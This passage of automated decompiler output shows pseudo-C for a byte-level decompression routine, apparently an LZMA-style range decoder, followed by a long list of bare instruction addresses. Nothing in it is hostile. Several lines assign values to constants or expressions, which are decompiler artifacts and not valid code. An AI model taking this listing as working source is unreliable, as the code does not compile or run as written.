													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                      0x00000000
                                                                      0x00406675
                                                                      0x00406675
                                                                      0x00406679
                                                                      0x00406686
                                                                      0x00406690
                                                                      0x00000000
                                                                      0x0040667b
                                                                      0x0040667b
                                                                      0x004066b6
                                                                      0x004066b9
                                                                      0x004066bc
                                                                      0x004066bf
                                                                      0x004066bf
                                                                      0x004066c2
                                                                      0x004066c9
                                                                      0x004066ce
                                                                      0x004065af
                                                                      0x004065b2
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406975
                                                                      0x00406979
                                                                      0x00406b28
                                                                      0x00406b3e
                                                                      0x00406b46
                                                                      0x00406b4d
                                                                      0x00406b4f
                                                                      0x00406b56
                                                                      0x00406b5a
                                                                      0x00406b5a
                                                                      0x00406985
                                                                      0x0040698c
                                                                      0x00406994
                                                                      0x00406997
                                                                      0x0040699a
                                                                      0x0040699a
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x00406145
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00000000
                                                                      0x00406156
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040615f
                                                                      0x00406162
                                                                      0x00406165
                                                                      0x00406169
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040616f
                                                                      0x00406172
                                                                      0x00406174
                                                                      0x00406175
                                                                      0x00406178
                                                                      0x0040617a
                                                                      0x0040617b
                                                                      0x0040617d
                                                                      0x00406180
                                                                      0x00406185
                                                                      0x0040618a
                                                                      0x00406193
                                                                      0x004061a6
                                                                      0x004061a9
                                                                      0x004061b5
                                                                      0x004061dd
                                                                      0x004061df
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061e1
                                                                      0x004061e4
                                                                      0x004061e5
                                                                      0x004061e5
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061bb
                                                                      0x004061c0
                                                                      0x004061c0
                                                                      0x004061c9
                                                                      0x004061d1
                                                                      0x004061d4
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061f7
                                                                      0x004061f7
                                                                      0x004061fb
                                                                      0x00406aa7
                                                                      0x00000000
                                                                      0x00406aa7
                                                                      0x00406204
                                                                      0x00406214
                                                                      0x00406217
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621d
                                                                      0x00406221
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406223
                                                                      0x00406229
                                                                      0x00406253
                                                                      0x00406259
                                                                      0x00406260
                                                                      0x00000000
                                                                      0x00406260
                                                                      0x0040622f
                                                                      0x00406232
                                                                      0x00406237
                                                                      0x00406237
                                                                      0x00406242
                                                                      0x0040624a
                                                                      0x0040624d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406292
                                                                      0x00406298
                                                                      0x0040629b
                                                                      0x004062a8
                                                                      0x004062b0
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406267
                                                                      0x00406267
                                                                      0x0040626b
                                                                      0x00406ab6
                                                                      0x00000000
                                                                      0x00406ab6
                                                                      0x00406277
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406285
                                                                      0x00406288
                                                                      0x0040628b
                                                                      0x00406290
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062b8
                                                                      0x004062ba
                                                                      0x004062bd
                                                                      0x0040632e
                                                                      0x00406331
                                                                      0x00406334
                                                                      0x0040633b
                                                                      0x00406345
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x004062bf
                                                                      0x004062c3
                                                                      0x004062c6
                                                                      0x004062c8
                                                                      0x004062cb
                                                                      0x004062ce
                                                                      0x004062d0
                                                                      0x004062d3
                                                                      0x004062d5
                                                                      0x004062da
                                                                      0x004062dd
                                                                      0x004062e0
                                                                      0x004062e4
                                                                      0x004062eb
                                                                      0x004062ee
                                                                      0x004062f5
                                                                      0x004062f9
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x00406305
                                                                      0x00406308
                                                                      0x00406326
                                                                      0x00406328
                                                                      0x00000000
                                                                      0x0040630a
                                                                      0x0040630a
                                                                      0x0040630d
                                                                      0x00406310
                                                                      0x00406313
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x0040631d
                                                                      0x0040631e
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406557
                                                                      0x0040655b
                                                                      0x00406579
                                                                      0x0040657c
                                                                      0x00406583
                                                                      0x00406586
                                                                      0x00406589
                                                                      0x0040658c
                                                                      0x0040658f
                                                                      0x00406592
                                                                      0x00406594
                                                                      0x0040659b
                                                                      0x0040659c
                                                                      0x0040659e
                                                                      0x004065a1
                                                                      0x004065a4
                                                                      0x004065a7
                                                                      0x004065a7
                                                                      0x004065ac
                                                                      0x00000000
                                                                      0x004065ac
                                                                      0x0040655d
                                                                      0x00406560
                                                                      0x00406563
                                                                      0x0040656d
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x004065c1
                                                                      0x004065c5
                                                                      0x004065e8
                                                                      0x004065eb
                                                                      0x004065ee
                                                                      0x004065f8
                                                                      0x004065c7
                                                                      0x004065c7
                                                                      0x004065ca
                                                                      0x004065cd
                                                                      0x004065d0
                                                                      0x004065dd
                                                                      0x004065e0
                                                                      0x004065e0
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406604
                                                                      0x00406608
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040660e
                                                                      0x00406612
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406618
                                                                      0x0040661a
                                                                      0x0040661e
                                                                      0x0040661e
                                                                      0x00406621
                                                                      0x00406625
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040669c
                                                                      0x004066a0
                                                                      0x004066a7
                                                                      0x004066aa
                                                                      0x004066ad
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066b0
                                                                      0x004066b3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040675c
                                                                      0x0040675c
                                                                      0x00406760
                                                                      0x00406afe
                                                                      0x00000000
                                                                      0x00406afe
                                                                      0x00406766
                                                                      0x00406769
                                                                      0x0040676c
                                                                      0x00406770
                                                                      0x00406773
                                                                      0x00406779
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677e
                                                                      0x00406781
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406351
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406ac2
                                                                      0x00000000
                                                                      0x00406ac2
                                                                      0x0040635b
                                                                      0x0040635e
                                                                      0x00406361
                                                                      0x00406365
                                                                      0x00406368
                                                                      0x0040636e
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406373
                                                                      0x00406376
                                                                      0x00406376
                                                                      0x00406379
                                                                      0x0040637c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406382
                                                                      0x00406388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040638e
                                                                      0x0040638e
                                                                      0x00406392
                                                                      0x00406395
                                                                      0x00406398
                                                                      0x0040639b
                                                                      0x0040639e
                                                                      0x0040639f
                                                                      0x004063a2
                                                                      0x004063a4
                                                                      0x004063aa
                                                                      0x004063ad
                                                                      0x004063b0
                                                                      0x004063b3
                                                                      0x004063b6
                                                                      0x004063b9
                                                                      0x004063bc
                                                                      0x004063d8
                                                                      0x004063db
                                                                      0x004063de
                                                                      0x004063e1
                                                                      0x004063e8
                                                                      0x004063ec
                                                                      0x004063ee
                                                                      0x004063f2
                                                                      0x004063be
                                                                      0x004063be
                                                                      0x004063c2
                                                                      0x004063ca
                                                                      0x004063cf
                                                                      0x004063d1
                                                                      0x004063d3
                                                                      0x004063d3
                                                                      0x004063f5
                                                                      0x004063fc
                                                                      0x004063ff
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x0040640a
                                                                      0x0040640a
                                                                      0x0040640e
                                                                      0x00406ace
                                                                      0x00000000
                                                                      0x00406ace
                                                                      0x00406414
                                                                      0x00406417
                                                                      0x0040641a
                                                                      0x0040641e
                                                                      0x00406421
                                                                      0x00406427
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x0040642c
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x00406435
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406437
                                                                      0x0040643a
                                                                      0x0040643d
                                                                      0x00406440
                                                                      0x00406443
                                                                      0x00406446
                                                                      0x00406449
                                                                      0x0040644c
                                                                      0x0040644f
                                                                      0x00406452
                                                                      0x00406455
                                                                      0x0040646d
                                                                      0x00406470
                                                                      0x00406473
                                                                      0x00406476
                                                                      0x00406476
                                                                      0x00406479
                                                                      0x0040647d
                                                                      0x0040647f
                                                                      0x00406457
                                                                      0x00406457
                                                                      0x0040645f
                                                                      0x00406464
                                                                      0x00406466
                                                                      0x00406468
                                                                      0x00406468
                                                                      0x00406482
                                                                      0x00406489
                                                                      0x0040648c
                                                                      0x00000000
                                                                      0x0040648e
